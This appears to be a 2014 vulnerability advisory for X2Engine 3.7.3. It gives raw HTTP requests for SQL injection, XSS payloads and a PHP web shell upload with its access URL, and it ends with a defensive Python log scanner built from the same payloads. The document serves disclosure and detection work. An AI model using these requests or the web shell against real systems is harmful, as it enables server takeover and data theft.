X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

Posted Feb 27, 2014
Authored by HauntIT

X2Engine version 3.7.3 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
MD5 | 7fb5efe01bf5fb010514f711fc818978

# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| .02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access the shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
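As an added, defender-side example (not part of HauntIT's advisory): a small Python scanner that runs over constructed Apache-style access-log lines modelled on the request patterns above. It flags non-numeric values in the getEvents and ajaxUpload parameters the advisory shows being abused, and any direct request for a server-side script under the uploads/media/ directory. The log lines, client IPs and paths are constructed samples, not captured data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access-log line: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Parameters the advisory shows being abused; each should only ever carry a
# decimal integer, so anything else is a probe worth alerting on.
INT_ONLY_PARAMS = {
    "/profile/getEvents": ("lastEventId", "lastTimestamp"),
    "/media/ajaxUpload": ("CKEditorFuncNum",),
}
# Server-side script extensions that must never be served from the media upload dir.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

def classify(line):
    """Return (ip, path, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, findings = url.path, []
    if "/uploads/media/" in path and path.lower().endswith(SCRIPT_EXT):
        findings.append("script_in_upload_dir")
    params = parse_qs(url.query, keep_blank_values=True)
    for endpoint, names in INT_ONLY_PARAMS.items():
        if path.endswith(endpoint):
            for name in names:
                if any(not v.isdigit() for v in params.get(name, [])):
                    findings.append("non_numeric:" + name)
    return m.group("ip"), path, findings

def scan(log_text):
    """Return (ip, path, findings) for every line that produced a finding."""
    return [r for r in map(classify, log_text.splitlines()) if r and r[2]]

# Constructed sample log: SQLi probe, benign upload, shell fetch, DOM-XSS probe, benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2014:10:00:01 +0000] "GET /x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1" 200 512
10.0.0.5 - - [27/Feb/2014:10:00:02 +0000] "POST /x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1" 200 80
10.0.0.5 - - [27/Feb/2014:10:00:03 +0000] "GET /x2engine/uploads/media/admin/mishell.php?cmd=id HTTP/1.1" 200 40
10.0.0.5 - - [27/Feb/2014:10:00:04 +0000] "POST /x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&langCode=en HTTP/1.1" 200 80
10.0.0.7 - - [27/Feb/2014:10:00:05 +0000] "GET /x2engine/index.php/profile/getEvents?lastEventId=42&lastTimestamp=1393495200&profileId=1&myProfileId=1 HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(findings))
```

The upload request body itself is not visible in an access log, so the shell upload is caught at the point where the dropped file is executed under uploads/media/; on a hardened install that directory should not be served with PHP execution enabled at all.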